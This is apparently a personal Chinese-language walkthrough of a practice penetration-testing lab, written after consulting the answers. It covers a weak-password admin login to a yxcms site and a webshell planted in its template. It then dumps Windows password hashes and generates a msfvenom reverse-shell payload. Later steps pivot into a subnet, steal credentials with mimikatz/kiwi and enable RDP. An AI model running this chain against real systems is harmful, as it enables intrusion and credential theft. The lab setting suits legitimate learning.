靶机看答案渗透记录-1

nmap扫不到,但是可以ping通= =

打开主页之后是phpstudy探针,按照官方文档关闭

然后访问,是个目录遍历漏洞= =

经过配置进入了主页

找到后台

发现系统是yxcms的,询问雪殇知道可以下载yxcms的源码审计,然后发现后台入口

尝试弱密码admin/123456可以登陆

后台操作

  1. 有个sql执行可以执行某些操作

  2. 修改首页模板,index.php可以添加一句话木马, 使用weevely访问失败,但是可以使用 AntSword 访问

  3. 有个gethash的工具可以获取windows上面密码的hash值,但是没下到
    网上找到一个渗透工具集,好家伙白嫖真爽

    pwdump也可以获取hash,获取到了hash

    1
    2
    3
    Administrator:500:NO PASSWORD*********************:31D6CFE0D16AE931B73C59D7E0C089C0:::
    Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
    liukaifeng01:1000:NO PASSWORD*********************:31D6CFE0D16AE931B73C59D7E0C089C0:::
  4. 虽然找到了hash值,但是没有找到密码

  5. 开启了3306端口,可以尝试连接,但是连接失败,不允许连接

  6. 使用msf生成木马

    1
    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.117 lport=4444 -f exe -o /root/桌面/hakcer.exe

    kali下可以使用msfpc简化

    1
    sudo msfpc windows reverse eth1 4444
  7. msf使用exploit/multi/handler模块

    1
    2
    3
    set LPORT 4444
    set payload windows/meterpreter/reverse_tcp
    run

    上传生成的木马到靶机,执行,连接成功,执行sysinfo命令测试是否成功

  8. run vnc进行桌面监控

  9. run autoroute -s 192.168.52.1/24
    这条命令允许攻击机进入192.168.52.1/24子网

  10. arp -a查看域控成员

  11. 使用background把当前session保存至后台

  12. 扫描远端IP

    1
    2
    3
    use auxiliary/scanner/portscan/tcp
    set RHOSTS 192.168.52.141
    run
  13. 开放了445端口,ms17_010漏洞,大佬说蓝屏,还没试

  14. ms08_067攻击失败

  15. 再次连接win7,使用load mimikatz获得凭证

  16. getsystem命令 sysinfo命令 ps命令

  17. migrate命令,explorer为2872

  18. 之前load了mimikatz(kiwi)插件,然后执行creds_tspkg获取域控密码,新版本msf变了,遇事不决help

  19. 使用run post/windows/manage/enable_rdp开启windows的rdp远程桌面

  20. linux使用rdesktop连接,windows直接使用远程桌面连接
    用户名和密码为Administrator/hongrisec@2019

总结

  1. 知道系统相关信息之后可以下载相关源码进行审计发现漏洞。从而找到管理登陆页面,弱密码等
  2. pwdump可以获取windows的密码哈希值
  3. msfvenom可以生成木马,msfpc简化生成操作,木马连接到exploit/multi/handler
  4. run vnc用于监控桌面,远程桌面等
  5. run autoroute -s 192.168.52.1/24,这条命令允许攻击机进入192.168.52.1/24子网
  6. msf background把当前session保存至后台,sessions -l 列出所有session,sessions num切换至第num个session
  7. 使用auxiliary/scanner/portscan/tcp扫描对应网段的主机
  8. mimikatz插件用于获取登陆凭证,插件已经被替换为kiwi,使用help获取相关用法
  9. 使用run post/windows/manage/enable_rdp开启远程桌面
  10. Linux使用rdesktop,windows使用远程桌面连接远程桌面
  11. migrate命令进程迁移,让进程成为目标机器某个合法进程的子进程,比如说explorer.exe

两个漏洞

  1. msf17_010
  2. msf08_067
    都使用了445端口
    MS08-067漏洞原理分析及还原 - 乃逸夫的文章 - 知乎
    https://zhuanlan.zhihu.com/p/27155431